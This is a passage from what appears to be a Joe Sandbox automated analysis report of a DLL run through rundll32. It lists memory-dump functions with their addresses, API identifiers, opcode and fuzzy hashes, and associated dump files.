                                                                                                                                  • Instruction Fuzzy Hash: 9A31CDE37603183AF91B86AA7E16FBD90029B52BF5C5493317D3906BC6F13C68CB8540
                                                                                                                                  Function 00007FFD92DB5730 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                  • Opcode ID: 1b918266017da50b484d804a6e5f9ffc8affa716ca4f326f04ec168ee7db8834
                                                                                                                                  • Instruction ID: 594fb99310e602a876462ad98b241a36170ca0f334ec211b30765dd59e35306f
                                                                                                                                  • Opcode Fuzzy Hash: 1b918266017da50b484d804a6e5f9ffc8affa716ca4f326f04ec168ee7db8834
                                                                                                                                  • Instruction Fuzzy Hash: C2C04C25F1B64381E5642FE66C5662822AC6F48741F544574C40D65751DF2C21A56700
                                                                                                                                  Function 00007FFD92DBB010 Relevance: 1.2, Instructions: 1223COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5b3a9f27d3748690381f14d1e84d4ef590ead69d440b9731addbdb68ae1405b4
                                                                                                                                  • Instruction ID: f410bb0f3aa4bc897e5e26b065ebda7e23bb870ab8768e710b270df6cf8615f1
                                                                                                                                  • Opcode Fuzzy Hash: 5b3a9f27d3748690381f14d1e84d4ef590ead69d440b9731addbdb68ae1405b4
                                                                                                                                  • Instruction Fuzzy Hash: A352E023F09A9585FB208FAAD4642BD6B70FB69B89F045235DE8D13BA5DF78E441C340
                                                                                                                                  Function 00007FFD92DB55E0 Relevance: .8, Instructions: 794COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 84b319c5f2655c164488de62dd5dfc161048c04a910b7c03c32d21999ff64712
                                                                                                                                  • Instruction ID: 000f8ca908bb6b9fcf4e7ea9af2e3b28aa6bf6221967004913a4781284b86a84
                                                                                                                                  • Opcode Fuzzy Hash: 84b319c5f2655c164488de62dd5dfc161048c04a910b7c03c32d21999ff64712
                                                                                                                                  • Instruction Fuzzy Hash: 2E827921F09A4289FA79EFE6A8701B927A8FF407C5B045235E94E63B95DF7CE441D380
                                                                                                                                  Function 00007FFD92EF8150 Relevance: .8, Instructions: 786COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d57d8dfb4f870235899d6e05fcac4265922c9cdd9637f23a9c532849bcb5aedb
                                                                                                                                  • Instruction ID: d9da82cd315a0dbcc127532f565804f173ebb61b20d57c5cdbe1856017dfe7e1
                                                                                                                                  • Opcode Fuzzy Hash: d57d8dfb4f870235899d6e05fcac4265922c9cdd9637f23a9c532849bcb5aedb
                                                                                                                                  • Instruction Fuzzy Hash: 93E1F262705A4981FE24DB92A6A42BDA262EB44BF1F544335DE7D07BD9DFBCE041C380
                                                                                                                                  Function 00007FFD92EC20B0 Relevance: .7, Instructions: 749COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6a3bb3a2a050d020c3545ecfecaee3252b68714f1556263e11e5645d473f6c43
                                                                                                                                  • Instruction ID: c5c54fe28eed72ffa7bc2fc6d06195d17677207bb2413911884cd5278ff78423
                                                                                                                                  • Opcode Fuzzy Hash: 6a3bb3a2a050d020c3545ecfecaee3252b68714f1556263e11e5645d473f6c43
                                                                                                                                  • Instruction Fuzzy Hash: 2962F473B186C48BE768CF59E5507AABBA0F798784F004139EB8A47B95DA7DE540CF00
                                                                                                                                  Function 00007FFD92DB3870 Relevance: .7, Instructions: 702COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 25cfe50a0188f6103bdbb9c7f68d0b927b70e48ea62fc574dc271ac024ef9543
                                                                                                                                  • Instruction ID: 53da3d612f4eed641ed58f6d1d24169efaff91981488f34810f3e2aa97f82834
                                                                                                                                  • Opcode Fuzzy Hash: 25cfe50a0188f6103bdbb9c7f68d0b927b70e48ea62fc574dc271ac024ef9543
                                                                                                                                  • Instruction Fuzzy Hash: DA029222B08B4281FA34EF99E4A00B96364FF84BD5F181235EA9D17BE5DF6DE441D740
                                                                                                                                  Function 00007FFD92DBF5C0 Relevance: .7, Instructions: 699COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 00f7eeb60f0f8f4ddebf870574e0d6173ebf94e3ac48340c1803a340cfc198f9
                                                                                                                                  • Instruction ID: 2f16c5241e7b1b92cd1d521c773fdef41ec1aab97bfba68b098d6c67a15902bb
                                                                                                                                  • Opcode Fuzzy Hash: 00f7eeb60f0f8f4ddebf870574e0d6173ebf94e3ac48340c1803a340cfc198f9
                                                                                                                                  • Instruction Fuzzy Hash: 18F1DC23B09B4589FB20CFA6D5612AD6371FB48BA9F504235DE9C47B99DF78E086C340
                                                                                                                                  Function 00007FFD92DB57B0 Relevance: .6, Instructions: 639COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2e538e6fe3e14b25c35094ee34b37eeaae207e3c772da95f36b8f89b50902ee3
                                                                                                                                  • Instruction ID: feaab3d72aef5756c589bed99c7c9df7c2f7112fec8b278e3bedacc48f652201
                                                                                                                                  • Opcode Fuzzy Hash: 2e538e6fe3e14b25c35094ee34b37eeaae207e3c772da95f36b8f89b50902ee3
                                                                                                                                  • Instruction Fuzzy Hash: 46528B26B08A8686FB30CF96D5613B92770FB86B85F549231CE4E17B96CF7CE4599300
                                                                                                                                  Function 00007FFD92DBC7B0 Relevance: .6, Instructions: 639COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 00fd41e96700cb4ee0bf1d7fad2059dc57add31a2cc918465e4367d51e4cad19
                                                                                                                                  • Instruction ID: a7ecee1de2be14297caf0619b1584a6b065b2aec25c3e40c06296b8b7d77145a
                                                                                                                                  • Opcode Fuzzy Hash: 00fd41e96700cb4ee0bf1d7fad2059dc57add31a2cc918465e4367d51e4cad19
                                                                                                                                  • Instruction Fuzzy Hash: A7528A62B08A4682FB34CFA6D4612B92770FB85F85F448231DE9E177A2CF7DE4599300
                                                                                                                                  Function 000000018001F28C Relevance: .6, Instructions: 618COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3382485803-0
                                                                                                                                  • Opcode ID: 11ca8ba6c9e4bc976ad0728efb636439ff8e0f3983e089c52a7ed5c8f874d3e2
                                                                                                                                  • Instruction ID: 84605ef311baa56bc5b68e2491e6a8dcf644c937c9e5222fdf1f18ce1bf163ab
                                                                                                                                  • Opcode Fuzzy Hash: 11ca8ba6c9e4bc976ad0728efb636439ff8e0f3983e089c52a7ed5c8f874d3e2
                                                                                                                                  • Instruction Fuzzy Hash: 0A427A72604A8886FBA68F25D5503BD3361FB89BC8F54D602EF8A17B95DF38C659C300
                                                                                                                                  Function 000000018001FA9C Relevance: .6, Instructions: 618COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3382485803-0
